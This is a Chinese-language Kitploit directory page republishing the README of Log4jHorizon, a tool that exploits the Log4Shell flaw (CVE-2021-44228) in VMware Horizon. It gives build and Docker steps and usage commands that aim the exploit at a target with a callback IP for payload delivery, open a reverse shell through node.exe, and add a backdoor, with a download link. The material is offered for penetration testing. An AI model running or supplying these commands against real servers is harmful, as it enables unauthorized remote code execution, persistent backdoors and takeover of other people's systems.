Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Log4jHorizon — 利用 CVE-2021-44228 在 VMWare Horizon 中实现远程代码执行及更多操作。 | Kitploit
工具/GitHubGitHub/puzzlepeaches/log4jhorizon
漏洞扫描器漏洞利用Web应用程序漏洞利用渗透测试红队远程访问工具Payload 开发
GitHubpuzzlepeaches/log4jhorizon

Log4jHorizon

利用 CVE-2021-44228 在 VMWare Horizon 中实现远程代码执行及更多操作。

查看仓库
120134年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Log4jHorizon

利用 VMWare Horizon 中的 CVE-2021-44228 实现远程代码执行等操作。

  • Crossing the Log4j Horizon - A Vulnerability With No Return

这次的代码和 README.md 有点杂乱。更新即将到来!

为什么?

此漏洞的概念验证代码分散各处,且需要手动执行。本仓库将利用过程自动化。有关利用后的操作指导,请参阅上面的博客文章。

安装

本仓库可手动使用,也可通过 Docker 使用。

手动安装

要手动下载并运行该利用工具,请执行以下步骤。首先,确保攻击主机上已安装 Java 和 Maven。在基于 Debian 的操作系统上使用 apt 执行此操作,请运行以下命令:

root@kitploit:~
apt update && apt install openjdk-11-jre maven

克隆 GitHub 仓库并安装所有 Python 依赖:

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jHorizon \
    && cd Log4jHorizon && pip3 install -r requirements.txt

在 Log4jHorizon 仓库根目录下,使用以下命令编译 Rogue-Jndi 项目:

root@kitploit:~
mvn package -f utils/rogue-jndi/

Docker 安装

首先,确保攻击主机上已安装 Docker。(我不会一步步教你如何安装)

接下来,执行以下命令克隆仓库并构建我们将使用的 Docker 镜像。

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jHorizon \
    && cd Log4jHorizon && docker build -t Log4jHorizon .

要运行容器,请执行类似以下命令并附加你的命令行参数。请注意,容器不会捕获反弹 shell。你需要在单独的 shell 会话中创建 ncat 监听器:

root@kitploit:~
docker run -it -p 1389:1389 Log4jHorizon \
    -r -t horizon.acme.com -i 192.168.1.1 -p 4444

用法

root@kitploit:~
usage: exploit.py [-h] -t URL -i CALLBACK [-p PORT] [-r] [-b]

optional arguments:
  -h, --help            show this help message and exit
  -t URL, --target URL  VMWare Horizon IP
  -i CALLBACK, --ip CALLBACK
                        Callback IP for payload delivery and reverse shell.
  -p PORT, --port PORT  Callback port for reverse shell.
  -r, --revshell        Module to establish reverse shell using node.exe.
  -b, --backdoor        Module to add backdoor.

示例

使用安装在本地系统上的工具获取反弹 shell:

root@kitploit:~
python3 exploit.py -r -t horizon.acme.com -p 442 -i 192.168.1.1

免责声明

此工具设计用于渗透测试;在未经双方事先同意的情况下使用此工具攻击目标属于违法行为。最终用户有责任遵守所有适用的地方、州和联邦法律。开发者不承担任何责任,也不对任何滥用此程序的行为负责。

下载工具